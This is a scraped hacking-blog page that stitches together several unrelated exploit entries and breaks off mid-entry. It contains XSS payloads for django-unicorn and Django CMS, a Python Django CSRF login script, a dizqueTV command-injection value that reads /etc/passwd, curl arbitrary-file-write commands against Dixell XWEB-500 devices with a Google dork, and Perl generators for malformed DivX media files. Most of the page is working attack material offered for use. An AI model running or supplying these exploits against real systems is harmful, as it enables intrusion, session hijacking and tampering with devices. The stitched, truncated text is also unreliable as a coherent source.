# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <= 0.35.3
# CVE: CVE-2021-42053
django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests.
Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).
POC:
POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: ""Linux""
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""<img src=x onerror=alert(origin)>""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871}
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct""
Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800}
Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400
{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""<img src=x onerror=alert(origin)>""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""<div unicorn:id=\""Q43GSmJh\"" unicorn:name=\""todo\"" unicorn:key=\""\"" unicorn:checksum=\""ZQn54Ct4\"">\n<form unicorn:submit.prevent=\""add\"">\n<input type=\""text\"" unicorn:model.lazy=\""task\"" placeholder=\""New task\"" id=\""task\""/>\n</form>\n<button unicorn:click=\""add\"">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\""$reset\"">Clear all tasks</button>\n</p>\n</div>\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}"
"ENDTEXT"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863152460
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Document Title:
===============
Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1869
Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186
CVE-ID:
=======
CVE-2016-6186
Release Date:
=============
2016-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
1869
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines.
django CMS offers out-of-the-box support for the common features you’d expect from a CMS, but can also be easily customised and
extended by developers to create a site that is tailored to their precise needs.
(Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 Content Management System.
Vulnerability Disclosure Timeline:
==================================
2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-07-04 Vendor Notification (Django Security Team)
2016-07-07: Vendor Response/Feedback (Django Security Team)
2016-07-18: Vendor Fix/Patch (Django Service Developer Team)
2016-07-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Divio AG
Product: Django Framework - Content Management System 3.3.0
Divio AG
Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System.
The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the
application-side of the vulnerable modules web context.
The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request.
Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution.
The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/`
data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any
payload inside of the option tag.
The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST.
The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already
existing snippets on add.
Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in
the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Editor - Snippets (Add)
Vulnerable Input(s):
[+] Name
Parameter(s):
[+] select
Affected Module(s):
[+] Snippets Options Listing [./djangocms_snippet/snippet/] - option
Proof of Concept (PoC):
=======================
The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction.
For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login to your django cms website with version 3.3.0
2. Open the structure module
3. Click to edit a page module
Note: Now the editor opens with the main default plugins
4. Mark a text passage and click to the code snippets plugin that is configured by default installation
5. Click the plus to add a new snippet of code
6. Inject a script code payload in java-script to the input field of the Name
7. Save the entry iva POST method request
8. Now click the box to choose the vulnerable injected payload
9. The script code payload executes in the box listing without secure parse or filter to encode
10. Successful reproduce of the application-side validation vulnerability in the editors snippet module!
Note:
Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet
the stable saved categories provoke the execution of the payload.
PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) <select> <option>
...
<fieldset class="module aligned ">
<div class="form-row field-snippet">
<div>
<label class="required" for="id_snippet">Snippet:</label>
<div class="related-widget-wrapper">
<select id="id_snippet" name="snippet">
<option value="">---------</option>
<option value="3" selected="selected">"><"<img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=http://www.vulnerability-lab.com onload=alert(document.cookie)<>[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]%20<iframe></iframe></option>
<option value="1">Social AddThis</option>
<option value="2">tour "><"<img src="x">%20%20>"<iframe src=a>%20<iframe></option>
</select>
<a href="/en/admin/djangocms_snippet/snippet/3/?_to_field=id&_popup=1" class="related-widget-wrapper-link change-related"
id="change_id_snippet" data-href-template="/en/admin/djangocms_snippet/snippet/__fk__/?_to_field=id&_popup=1" title="Change selected Snippet">
<img src="/static/admin/img/icon_changelink.gif" alt="Change" height="10" width="10">
</a>
<a class="related-widget-wrapper-link add-related" id="add_id_snippet" href="/en/admin/djangocms_snippet/snippet/add/?_to_field=id&_popup=1" title="Add another Snippet">
<img src="/static/admin/img/icon_addlink.gif" alt="Add" height="10" width="10">
</a>
</div>
</div>
</div>
</fieldset>
...
--- PoC Session Logs [POST] (Injection) [GET] (Execution) ---
Status: 200[OK]
POST http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
POST-Daten:
POSTDATA =-----------------------------30880199939743
Content-Disposition: form-data; name="csrfmiddlewaretoken"
LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm
-----------------------------30880199939743
Content-Disposition: form-data; name="_popup"
1
-----------------------------30880199939743
Content-Disposition: form-data; name="_to_field"
id
-----------------------------30880199939743
Content-Disposition: form-data; name="name"
test <img src="x">%20%20>"<iframe src="a">%20<iframe>
"><"<img src="x">%20%20>"<iframe src=a>[PERSISTENT INJECTED SCRIPT CODE VIA SNIPPET NAME!]%20<iframe>
-----------------------------30880199939743
Content-Disposition: form-data; name="html"
sd
-----------------------------30880199939743
Content-Disposition: form-data; name="template"
aldryn_tour/tour.html
-----------------------------30880199939743
Content-Disposition: form-data; name="slug"
tour
-----------------------------30880199939743
Content-Disposition: form-data; name="_save"
Save
-----------------------------30880199939743--
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
X-Aldryn-App[django-cms-3-3-demo-sopegose-stage]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Set-Cookie[sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; expires=Mon, 18-Jul-2016 09:34:19 GMT; Max-Age=1209600; Path=/]
-
Status: 301[MOVED PERMANENTLY]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html; charset=utf-8]
Location[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x/]
Content-Language[en]
-
Status: 200[OK]
GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/a/[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
Request Header:
Host[django3-3-0.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
Connection[keep-alive]
Response Header:
Transfer-Encoding[chunked]
X-Proxy-Request-Received[0]
Server[Aldryn-LoadBalancer/2.0]
Date[Mon, 04 Jul 2016 09:34:19 GMT]
Content-Language[en]
Expires[Mon, 04 Jul 2016 09:34:19 GMT]
Vary[Cookie]
Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
X-Frame-Options[SAMEORIGIN]
Content-Type[text/html]
Reference(s):
http://django3-3-0.localhost:8080/
http://django3-3-0.localhost:8080/en/
http://django3-3-0.localhost:8080/en/admin/
http://django3-3-0.localhost:8080/en/admin/cms/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/
http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/
http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/9/
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the vulnerable Name input field in the add snippets editor module.
Restrict the input and disallow the usage of special chars. Escape the entries in case of emergency and use plain-text values.
Encode in the snippets module listing the vulnerable box with the name listing to prevent the execution point of the vulnerability.
Resolution:
Patches to resolve the issues have been applied to Django's master development branch and the 1.10, 1.9, and 1.8 release branches.
The patches may be obtained from the following changesets:
- On the development master branch
- On the 1.10 release branch
- On the 1.9 release branch
- On the 1.8 release branch
The following new releases have been issued:
- Django 1.10rc1
- Django 1.9.8
- Django 1.8.14
Reference(s):
https://developer.mozilla.org/en-US/docs/Web/API/element/innerHTML
Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the django cms is estimated as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass
# Date: 2020-04-08
# Exploit Author: Spad Security Group
# Vendor Homepage: https://www.djangoproject.com/
# Software Link: https://pypi.org/project/Django/
# Version: 3.0 =<
# Tested on: windows 10
# Language: python3.8
# t.me/SpadSec
# Spad Security Group
from requests import Session
import sys
from bs4 import BeautifulSoup
from time import sleep
from colorama import Fore, Style
from random import choice
from os import name, system
colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW]
def cleaner():
if name == "nt":
system("cls")
else:
system("clear")
def logo_printer():
cleaner()
logo = r"""
\_______/
`.,-'\_____/`-.,'
/`..'\ _ /`.,'\
/ /`.,' `.,'\ \
/__/__/ \__\__\__
\ \ \ / / /
\ \,'`._,'`./ /
\,'`./___\,'`./
,'`-./_____\,-'`.
/ \
"""
_logo_enumer = 0
for char in logo:
sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}")
sys.stdout.flush()
_logo_enumer +=1
sleep(0.005)
print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec")
class DjangoCsrfMiddleWareBypass:
def __init__(self, url: str, username: str, password: str):
self.url = url
self.username = username
self.password = password
logo_printer()
self.cookies = {}
self.session = Session()
self.bypass()
def spad_printer(self, string):
print("\n")
for char in string:
sys.stdout.write(char)
sys.stdout.flush()
sleep(0.05)
def bypass(self):
global colors
_conn = self.session.get(self.url)
self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}")
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...")
for key, value in _conn.cookies.items():
self.cookies[key] = value
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!")
soup = BeautifulSoup(_conn.text, "lxml")
csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']
self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}")
login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies)
if len(login.history) >= 2:
if login.history[1].is_redirect:
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in")
else:
self.spad_printer("[-] Error")
else:
if login.history:
if login.history[0].is_redirect:
self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}")
for key, value in self.session.cookies.items():
self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}")
else:
self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
else:
self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error")
if __name__ == "__main__":
try:
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
DjangoCsrfMiddleWareBypass(url, username, password)
except IndexError:
logo_printer()
for char in f"[!] python {sys.argv[0]} http://google.com username password":
sys.stdout.write(char)
sys.stdout.flush()
sleep(0.05)
EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip
# django_cve_2019_19844_poc
PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
# Requirements
- Python 3.7.x
- PostgreSQL 9.5 or higher
## Setup
1. Create database(e.g. `django_cve_2019_19844_poc`)
1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
1. Create the following user with `shell` command:
```python
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
```
## Procedure For Reproducing
1. Run `./manage.py runserver`
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
1. Input `mıke@example.org` (Attacker's email), and click send button
1. Receive email (Check console), and reset password
1. Login as `mike123` user
# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)
# Date: 9/21/2024
# Exploit Author: Ahmed Said Saud Al-Busaidi
# Vendor Homepage: https://github.com/vexorian/dizquetv
# Version: 1.5.3
# Tested on: linux
POC:
## Vulnerability Description
dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.
## STEPS TO REPRODUCE
1. go to http://localhost/#!/settings
2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"
3. click on update
4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
# Exploit Title: Dixell XWEB-500 - Arbitrary File Write
# Google Dork: inurl:"xweb500.cgi"
# Date: 03/01/2022
# Exploit Author: Roberto Palamaro
# Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
# Version: XWEB-500
# Tested on: Dixell XWEB-500
# References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
# Endpoint: logo_extra_upload.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
# Write file
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -is "http://[target]:[port]/logo/"
# Endpoint: lo_utils.cgi
# Here ACTION=5 is to enable write mode
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify using ACTION=3 to listing resources
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Endpoint: cal_save.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi
source: https://www.securityfocus.com/bid/47042/info
DivX Player is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage these issues to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
DivX Player 6.0, 6.8, 6.9, and 7.0 are vulnerable; other versions may also be affected.
================================
#!/usr/bin/perl
###
# Title : DivX Player v7.0 (.avi) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat AVI file (14 bytes)
# => 2 - Open AVI file With DivX Player
# => 3 - OverFlow & Crshed !!!
# ------------
# Homologue Bug in MP_Classic: (http://exploit-db.com/exploits/11535) || By : cr4wl3r
# ------------
# Assembly Error in [quartz.dll] ! 74872224() ! :
# 0x74872221 ,0x83 0xd2 0x00 || [adc] edx,0
# 0x74872224 ,0xf7 0xf1 [div] || eax,acx << (" Error Here ")
# 0x74872226 ,0x0f 0xa4 0xc2 0x10 [shld] || edx,eax,10h
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |============================================|\n";
print " |= [!] Name : DivX Player v6 & 7.0 AVI File =|\n";
print " |= [!] Exploit : Local Buffer Overflow =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |============================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"; # AVI Header
open(file , ">", "Kedans.avi"); # Evil File AVI (14 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
# Thanks To : ' cr4wl3r ' From Indonesia & All Indonesia MusLim HacKers
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
================================
#!/usr/bin/perl
###
# Title : DivX Player v7.0 (.ape) Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Overflow in 'DivX Player.exe' Process
# Tested on : Windows XP SP3 Fran.ais
# Target : DivX Player v6.8 & 6.9 & 7.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# Usage : 1 - Creat APE file ( Monkey's Audio Format )
# => 2 - Open APE file With DivX Player
# => 3 - OverFlow !!!
# Assembly Error in [MonkeySource.ax] ! 0f4151a6() ! :
# 0x0f4151a3 ,0xc2 0x80 0x00 [ret] || 8
# 0x0f4151a6 ,0xf7 0xf3 [div] || eax,abx << (" Error Here ")
# 0x0f4151a8 ,0x31 0xd2 [xor] || edx,edx
# 0x0f4151aa ,0xeb 0xf3 [jmp] || 0x0f41519f
# 0x0f4151ac ,0xc3 [ret] ||
# ------------
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "\n\n";
print " |===========================================================|\n";
print " |= [!] Name : DivX Player v6 & 7.0 || Monkey's Audio File =|\n";
print " |= [!] Exploit : Buffer Overflow Exploit =|\n";
print " |= [!] Author : KedAns-Dz =|\n";
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print " |===========================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
print file $PoC;
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
close(file);
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * x000.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
================================
#!/usr/bin/perl
###
# Title : DivX Player v7.0 (.mid) Buffer Overflow
